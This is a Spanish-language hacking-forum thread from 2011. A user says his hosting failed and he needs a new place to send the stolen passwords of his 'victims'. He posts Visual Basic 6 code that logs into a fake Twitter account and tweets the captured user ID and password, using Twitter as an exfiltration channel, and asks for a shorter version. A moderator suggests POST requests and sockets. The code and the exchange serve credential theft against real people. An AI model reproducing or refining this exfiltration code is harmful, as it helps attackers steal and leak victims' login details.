elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  twittear desde Vb6
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: twittear desde Vb6  (Leído 2,675 veces)
yalosabes

Desconectado Desconectado

Mensajes: 87


Ver Perfil
twittear desde Vb6
« en: 12 Marzo 2011, 01:00 am »

Bueno debido a problemas de mi hosting ( http://www.teensmagazine.net ) .. ya no tenia donde enviar claves datos, de mis victimas amigos.

Asi que lo mas practico que se ocurrio fue twittear, los datos obtrenido desde mi cuenta twitter (obiamente una cuenta nueva y falsa).

Mi pregunta es :

¿Existe alguna forma mas sencilla, de twittear desde Vb6? quizas en menos lineas..

Codigo:
Código
  1. Private Sub twittear()
  2. If wb2.LocationURL = "https://mobile.twitter.com/session/new" Then
  3. Me.wb2.Document.All("username").Value = "AquiCorreo"
  4. Me.wb2.Document.All("password").Value = "AquiContraseña"
  5. Dim HTML
  6. Dim HTMLI
  7. Set HTML = wb2.Document
  8. For Each HTMLI In HTML.getElementsByTagName("input")
  9.     If HTMLI.Type = "submit" Then
  10.       HTMLI.Click
  11.       Exit Sub
  12.     End If
  13.   Next
  14. End If
  15.  
  16. If wb2.LocationURL = "http://mobile.twitter.com/" Then
  17. 'p2.Visible = True
  18. Me.wb2.Document.All("tweet_text").Value = id.Text & contraseña.Text  
  19. Set HTML = wb2.Document
  20. For Each HTMLI In HTML.getElementsByTagName("input")
  21.     If HTMLI.Value = "Tweet" Then
  22.       HTMLI.Click
  23.       Exit Sub
  24.     End If
  25.   Next
  26.   End If
  27. End Sub
  28.  

pd : No confien en AqpHost -.-!


« Última modificación: 12 Marzo 2011, 01:04 am por raul338 » En línea

seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: twittear desde Vb6
« Respuesta #1 en: 12 Marzo 2011, 01:48 am »

busca sobre el metodo POST y sockets.


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Desde excel se puede invocar un web service y llamarlo desde VB
Programación Visual Basic
olve 0 3,676 Último mensaje 28 Enero 2010, 17:04 pm
por olve
El uso del móvil desde otro país de la UE se abaratará desde el 1 de julio
Noticias
wolfbcn 1 2,942 Último mensaje 1 Julio 2010, 02:06 am
por skan
boton twittear
Desarrollo Web
basickdagger 1 1,674 Último mensaje 2 Abril 2013, 14:45 pm
por #!drvy
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines